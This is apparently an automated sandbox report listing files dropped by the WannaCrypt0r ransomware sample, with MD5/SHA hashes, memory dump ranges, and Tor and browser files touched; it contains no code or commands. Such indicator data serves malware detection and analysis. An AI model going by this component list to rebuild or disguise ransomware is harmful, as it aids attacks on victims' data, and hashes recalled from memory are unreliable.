SHA512 0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

MD5 4fef5e34143e646dbf9907c4374276f5
SHA1 47a9ad4125b6bd7c55e4e7da251e23f089407b8f
SHA256 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79
SHA512 4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\t.wnry

MD5 5dcaac857e695a65f5c3ef1441a73a8f
SHA1 7b10aaeee05e7a1efb43d9f837e9356ad55c07dd
SHA256 97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6
SHA512 06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\s.wnry

MD5 ad4c9de7c8c40813f200ba1c2fa33083
SHA1 d1af27518d455d432b62d73c6a1497d032f6120e
SHA256 e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b
SHA512 115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\r.wnry

MD5 3e0020fc529b1c2a061016dd2469ba96
SHA1 c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade
SHA256 402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c
SHA512 5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_vietnamese.wnry

MD5 8419be28a0dcec3f55823620922b00fa
SHA1 2e4791f9cdfca8abf345d606f313d22b36c46b92
SHA256 1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8
SHA512 8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_turkish.wnry

MD5 531ba6b1a5460fc9446946f91cc8c94b
SHA1 cc56978681bd546fd82d87926b5d9905c92a5803
SHA256 6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415
SHA512 ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_swedish.wnry

MD5 c7a19984eb9f37198652eaf2fd1ee25c
SHA1 06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae
SHA256 146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4
SHA512 43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_spanish.wnry

MD5 8d61648d34cba8ae9d1e2a219019add1
SHA1 2091e42fc17a0cc2f235650f7aad87abf8ba22c2
SHA256 72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1
SHA512 68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_slovak.wnry

MD5 c911aba4ab1da6c28cf86338ab2ab6cc
SHA1 fee0fd58b8efe76077620d8abc7500dbfef7c5b0
SHA256 e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729
SHA512 3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_russian.wnry

MD5 452615db2336d60af7e2057481e4cab5
SHA1 442e31f6556b3d7de6eb85fbac3d2957b7f5eac6
SHA256 02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078
SHA512 7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_romanian.wnry

MD5 313e0ececd24f4fa1504118a11bc7986
SHA1 e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d
SHA256 70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1
SHA512 c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_portuguese.wnry

MD5 fa948f7d8dfb21ceddd6794f2d56b44f
SHA1 ca915fbe020caa88dd776d89632d7866f660fc7a
SHA256 bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66
SHA512 0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_polish.wnry

MD5 e79d7f2833a9c2e2553c7fe04a1b63f4
SHA1 3d9f56d2381b8fe16042aa7c4feb1b33f2baebff
SHA256 519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e
SHA512 e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_norwegian.wnry

MD5 ff70cc7c00951084175d12128ce02399
SHA1 75ad3b1ad4fb14813882d88e952208c648f1fd18
SHA256 cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a
SHA512 f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_latvian.wnry

MD5 c33afb4ecc04ee1bcc6975bea49abe40
SHA1 fbea4f170507cde02b839527ef50b7ec74b4821f
SHA256 a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536
SHA512 0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_korean.wnry

MD5 6735cb43fe44832b061eeb3f5956b099
SHA1 d636daf64d524f81367ea92fdafa3726c909bee1
SHA256 552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0
SHA512 60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_japanese.wnry

MD5 b77e1221f7ecd0b5d696cb66cda1609e
SHA1 51eb7a254a33d05edf188ded653005dc82de8a46
SHA256 7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e
SHA512 f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_italian.wnry

MD5 30a200f78498990095b36f574b6e8690
SHA1 c4b1b3c087bd12b063e98bca464cd05f3f7b7882
SHA256 49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07
SHA512 c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_indonesian.wnry

MD5 3788f91c694dfc48e12417ce93356b0f
SHA1 eb3b87f7f654b604daf3484da9e02ca6c4ea98b7
SHA256 23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4
SHA512 b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_greek.wnry

MD5 fb4e8718fea95bb7479727fde80cb424
SHA1 1088c7653cba385fe994e9ae34a6595898f20aeb
SHA256 e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9
SHA512 24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_german.wnry

MD5 3d59bbb5553fe03a89f817819540f469
SHA1 26781d4b06ff704800b463d0f1fca3afd923a9fe
SHA256 2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61
SHA512 95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_french.wnry

MD5 4e57113a6bf6b88fdd32782a4a381274
SHA1 0fccbc91f0f94453d91670c6794f71348711061d
SHA256 9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc
SHA512 4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_filipino.wnry

MD5 08b9e69b57e4c9b966664f8e1c27ab09
SHA1 2da1025bbbfb3cd308070765fc0893a48e5a85fa
SHA256 d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324
SHA512 966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_english.wnry

MD5 fe68c2dc0d2419b38f44d83f2fcf232e
SHA1 6c6e49949957215aa2f3dfb72207d249adf36283
SHA256 26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5
SHA512 941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_dutch.wnry

MD5 7a8d499407c6a647c03c4471a67eaad7
SHA1 d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b
SHA256 2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c
SHA512 608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_danish.wnry

MD5 2c5a3b81d5c4715b7bea01033367fcb5
SHA1 b548b45da8463e17199daafd34c23591f94e82cd
SHA256 a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6
SHA512 490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_czech.wnry

MD5 537efeecdfa94cc421e58fd82a58ba9e
SHA1 3609456e16bc16ba447979f3aa69221290ec17d0
SHA256 5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150
SHA512 e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_croatian.wnry

MD5 17194003fa70ce477326ce2f6deeb270
SHA1 e325988f68d327743926ea317abb9882f347fa73
SHA256 3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171
SHA512 dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_chinese (traditional).wnry

MD5 2efc3690d67cd073a9406a25005f7cea
SHA1 52c07f98870eabace6ec370b7eb562751e8067e9
SHA256 5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a
SHA512 0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_chinese (simplified).wnry

MD5 0252d45ca21c8e43c9742285c48e91ad
SHA1 5c14551d2736eef3a1c1970cc492206e531703c1
SHA256 845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a
SHA512 1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_bulgarian.wnry

MD5 95673b0f968c0f55b32204361940d184
SHA1 81e427d15a1a826b93e91c3d2fa65221c8ca9cff
SHA256 40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd
SHA512 7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\c.wnry

MD5 8124a611153cd3aceb85a7ac58eaa25d
SHA1 c1d5cd8774261d810dca9b6a8e478d01cd4995d6
SHA256 0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e
SHA512 b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\b.wnry

MD5 c17170262312f3be7027bc2ca825bf0c
SHA1 f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256 d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512 c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

MD5 7bf2b57f2a205768755c07f238fb32cc
SHA1 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256 b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA512 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

MD5 7a2726bb6e6a79fb1d092b7f2b688af0
SHA1 b3effadce8b76aee8cd6ce2eccbb8701797468a2
SHA256 840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5
SHA512 4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

MD5 0e77eb5fa0b7e8dffce86dca85b12cec
SHA1 4b277651979e79b77a794e9157790c063311ef0f
SHA256 a5409d16511cc1fed769215339f3995551cd575bb141cc17c8d9535ca77bef91
SHA512 a81fa129e856e4deea42fcf4e35f65fbbaf89481be3d48b398b96f88b1f39a990f03b00225c058d0447297ef3ea5929525c576f798b0ed9bce67fdffb6ae9b6b

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\tor.exe

MD5 fe7eb54691ad6e6af77f8a9a0b6de26d
SHA1 53912d33bec3375153b7e4e68b78d66dab62671a
SHA256 e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA512 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

memory/1588-2222-0x0000000073D20000-0x0000000073DA2000-memory.dmp

memory/1588-2224-0x0000000073D20000-0x0000000073DA2000-memory.dmp

memory/1588-2225-0x00000000739A0000-0x0000000073A22000-memory.dmp

memory/1588-2226-0x0000000073A30000-0x0000000073C4C000-memory.dmp

memory/1588-2223-0x0000000073A30000-0x0000000073C4C000-memory.dmp

memory/1588-2228-0x00000000739A0000-0x0000000073A22000-memory.dmp

memory/1588-2230-0x0000000000570000-0x000000000086E000-memory.dmp

memory/1588-2229-0x0000000073CD0000-0x0000000073CF2000-memory.dmp

memory/1588-2227-0x0000000073CD0000-0x0000000073CF2000-memory.dmp

memory/1588-2233-0x0000000000570000-0x000000000086E000-memory.dmp

memory/1588-2235-0x0000000073D00000-0x0000000073D1C000-memory.dmp

memory/1588-2234-0x0000000073D20000-0x0000000073DA2000-memory.dmp

memory/1588-2237-0x0000000073A30000-0x0000000073C4C000-memory.dmp

memory/1588-2238-0x0000000073C50000-0x0000000073CC7000-memory.dmp

memory/1588-2239-0x00000000739A0000-0x0000000073A22000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 9f274285cb69b93ae671f679de48999d
SHA1 45737398ee1962230a835dfffaef7a2ffb02bad4
SHA256 65c815cbba22347a46b9355aed50cddea336290ae4d6ea3a8071f991d6613788
SHA512 2bc175cfbcc2720b7d7c775f6d26233889ac65b8a9b68767e91f9266d52e2e02eb33a799e1f2c37f899c059fae703d4c51de8ac1f5cf0d01c38aef60fdb47ffc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 f0ef44abcb5541d1e93b27a9d8abe400
SHA1 6aa62ea7cac96c95c403b496fce1de612241135f
SHA256 e7b0b33c3e646a4e80728b8c9aa077d33484484568c3dc47774d7bc74c2998c7
SHA512 646f5175e736edebc69a8e99ab529b1935dbc398e87c73826924d641fe64c042ccd8bb93a3adaa8d0450db46119053650ea2bf5ba9215f1a81ec5533d8aac1df

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 0632f6745302406c03dfc5c3e5fff301
SHA1 fd2ae968200897f3f1fb31363fa327e4fbdd0a68
SHA256 392804690ec62c57223a1bae97606e34a9790b4dc0b4b523d709b5cf02451c0c
SHA512 7bdbf86c3a209fbb12eca38b1c64244205010ba1625a9e9a4008709fa71ec4d6b4370c2c9addcdb6e0ccf9cc1efd7a6050667eee401facf38a6fa6c8d5de6050

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f4af001a40d8516e5b3988185ecf8637
SHA1 b804575192b14d0a48633b972a7da03000f280b2
SHA256 c3135201516059d80aeb31c79faca310f0254a050882ecb18e019416e60dcba2
SHA512 280cea101e9b8973d3e39008a3e2fcabee277cd853c5c2e06e3b43a581699c75f9a846f9b0de0967d9958dda11f06299fa6bd52a91550dc5ed1c5384d889feca

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 e29405f36be12b4ca1d7b372f11da2e6
SHA1 dc9f48b4efb4aad521042f2000bd5534b635608e
SHA256 06492a7efa67c10ffe88ad82cca6dd66a9daeed701a1b18103dd91ade0b42606
SHA512 821e0763fdc3fd59281047d5257460af8217414654a9e265f89c09be7326c5cf139aef1b0204f8ce2bd95688bd502f39506bd94efa37c29c5c74f6f198ea9a9c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 8c230f7ea6487c87e7e5379592aac858
SHA1 56752ec7e3456fc3172692e9f75be5e30c213eda
SHA256 63485386c06f5d1bd00777471849bec25d729862da700f2b32c06f233debc5e8
SHA512 bbb0a2b072def0ff973baabb6abe40d586c8074639ce07de45ba47a34e0b8a8e373636402178d3518bf1fbdc6715afaa44a2a5fdcd714cb0eb31a195147b95f0

memory/1588-2370-0x0000000000570000-0x000000000086E000-memory.dmp

memory/1588-2374-0x0000000073A30000-0x0000000073C4C000-memory.dmp

memory/1588-2377-0x0000000000570000-0x000000000086E000-memory.dmp

memory/1588-2378-0x0000000000570000-0x000000000086E000-memory.dmp

memory/1588-2382-0x0000000073A30000-0x0000000073C4C000-memory.dmp

memory/1588-2386-0x0000000000570000-0x000000000086E000-memory.dmp

memory/1588-2390-0x0000000073A30000-0x0000000073C4C000-memory.dmp

memory/1588-2393-0x0000000000570000-0x000000000086E000-memory.dmp

memory/1588-2397-0x0000000073A30000-0x0000000073C4C000-memory.dmp

memory/1588-2442-0x0000000000570000-0x000000000086E000-memory.dmp

memory/1588-2446-0x0000000073A30000-0x0000000073C4C000-memory.dmp

memory/1588-2452-0x0000000000570000-0x000000000086E000-memory.dmp

memory/1588-2459-0x0000000000570000-0x000000000086E000-memory.dmp

memory/1588-2463-0x0000000073A30000-0x0000000073C4C000-memory.dmp

C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

MD5 09bcce93901bf97045eb0aa5ebcd54f8
SHA1 e4c868fa12430f3641db0645870e408ca2fac407
SHA256 6b5f1ebd6b2da70d286d8c6631520d00b586f7fe7369c08810a9ee38213ccb28
SHA512 2f86a34854dbe3d93176b7e8ccddee897d08fcef6d3bfe915e9d5027e98f55cddd4184218f6ade20a762d3a3136a0135be061b4ee5a2a35ee2e822d3305c19d3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 656bb397c72d15efa159441f116440a6
SHA1 5b57747d6fdd99160af6d3e580114dbbd351921f
SHA256 770ed0fcd22783f60407cdc55b5998b08e37b3e06efb3d1168ffed8768751fab
SHA512 5923db1d102f99d0b29d60916b183b92e6be12cc55733998d3da36d796d6158c76e385cef320ec0e9afa242a42bfb596f7233b60b548f719f7d41cb8f404e73c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d459a8c16562fb3f4b1d7cadaca620aa
SHA1 7810bf83e8c362e0c69298e8c16964ed48a90d3a
SHA256 fa31bc49a2f9af06d325871104e36dd69bfe3847cd521059b62461a92912331a
SHA512 35cb00c21908e1332c3439af1ec9867c81befcc4792248ee392080b455b1f5ce2b0c0c2415e344d91537469b5eb72f330b79feb7e8a86eeb6cf41ec5be5dfd2f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 40bd4adb0b17e472757794b9ea9f01e7
SHA1 9fbfb25cfe1392fcb111f99781db4b44e4f232ee
SHA256 fa7a5a025473f890dfa5a266d9588b1097cdecb2a0fcd9ed46e8cf17e908109f
SHA512 e8d5a2e267216c5798314bcf9bf2ccf0fe15913fea3299010d358e7ba05b59bd0e1d3edbb33d471976a2f56b3f380c2bd1ab2ff9f267c82bda265cadf801dcf1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b03c632be28aff844b8a5816bb003737
SHA1 68318b5e50da1f5f758d37e7fda4c6051c1fd120
SHA256 9c7f6c5ac49c505f6a2bf9faaa4e5b01ba4e58e9765b269baa024a0b57d556d8
SHA512 97128c3081d62706138520f28d8c7b406961d905179921512c34398bc7a8e61cbb9e142970307e182d5edacc2e527ba4493391cceda0f2bb4a5b10292add7f7b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

MD5 4b4947c20d0989be322a003596b94bdc
SHA1 f24db7a83eb52ecbd99c35c2af513e85a5a06dda
SHA256 96f697d16fbe496e4575cd5f655c0edb07b3f737c2f03de8c9dda54e635b3180
SHA512 2a3443e18051b7c830517143482bf6bffd54725935e37ee58d6464fac52d3ce29c6a85fc842b306feaa49e424ba6086942fc3f0fea8bb28e7495070a38ce2e59

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

MD5 8d1ef1b5e990728dc58e4540990abb3c
SHA1 79528be717f3be27ac2ff928512f21044273de31
SHA256 3bdb20d0034f62ebaa1b4f32de53ea7b5fd1a631923439ab0a24a31bccde86d9
SHA512 cd425e0469fdba5e508d08100c2e533ef095eeacf068f16b508b3467684a784755b1944b55eb054bbd21201ba4ce6247f459cc414029c7b0eb44bdb58c33ff14

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

MD5 657ed1b9ac0c74717ea560e6c23eae3e
SHA1 6d20c145f3aff13693c61aaac2efbc93066476ef
SHA256 ff95275ab9f5eadda334244325d601245c05592144758c1015d67554af125570
SHA512 60b6682071ade61ae76eed2fe8fa702963c04261bd179c29eed391184d40dc376136d3346b3809b05c44fb59f31b0e9ab95f1e6b19e735234d1f0613720e532f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

MD5 bcf8a9566c19c82f4bdb43f53a912bab
SHA1 aedbcfb45eed11b7ad362b53ff32bacec9f932ee
SHA256 52c97dd2602b4d9ac70b61c3dd9b0f9869c5c211e2a4b52e94eda5e150349ae7
SHA512 cfec8603b3eecc261735ddb3d9f292f47e5e34761d73c33b8a1fa1efcf8e07b9b5595a28eac3b238842cf1f63a155b0376840f42ab22ad3186390bcfbc62adfb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021

MD5 8b2813296f6e3577e9ac2eb518ac437e
SHA1 6c8066353b4d463018aa1e4e9bb9bf2e9a7d9a86
SHA256 befb3b0471067ac66b93fcdba75c11d743f70a02bb9f5eef7501fa874686319d
SHA512 a1ed4d23dfbe981bf749c2008ab55a3d76e8f41801a09475e7e0109600f288aa20036273940e8ba70a172dec57eec56fe7c567cb941ba71edae080f2fdcc1e0c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026

MD5 063fe934b18300c766e7279114db4b67
SHA1 d7e71855cf6e8d1e7fbaa763223857f50cd1d4bd
SHA256 8745914e0214bcd9d2e6a841f0679a81084ef3fc3d99125876bee26653f4253e
SHA512 9d0dfc21306b3a56c2ecdf1265392271969e3765e161e117c8765125b34793e24458217cf6514b364f351f47e65baaaf5856be0d13406a789f844d6ba8c7075f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

MD5 9ddefb34cdc7433e68d58cfc54afd013
SHA1 2a74522efe35efe4956828eb2172a4f9a0e7499e
SHA256 a198b75825125d7755c874913ec2305b557810db78fc3ffabc6ed85b2fedf079
SHA512 7b27c3e6dd1653e1d526f1c070906f119816cfab7dcddd6f12e5367a652713a08c20c9e709f121893d7c2044eb60aa87fbf3dbb1533638e576819473ca469700

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023

MD5 668b709219a3bc003ac35038ad55daa8
SHA1 65d4bd0e7a79f6717d00656d3774c9cddce8c536
SHA256 075482464634359e34d7d49320b08882ce1f8c742904910caddcae0db6d86989
SHA512 6bf60d57cd41c555f4f2a205994690882d44da5617de36a144219983f71f6e06112d15816b138cbd7bd37b29b9802f009c3503204c7e2b8b0354b3b3ac16b941

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

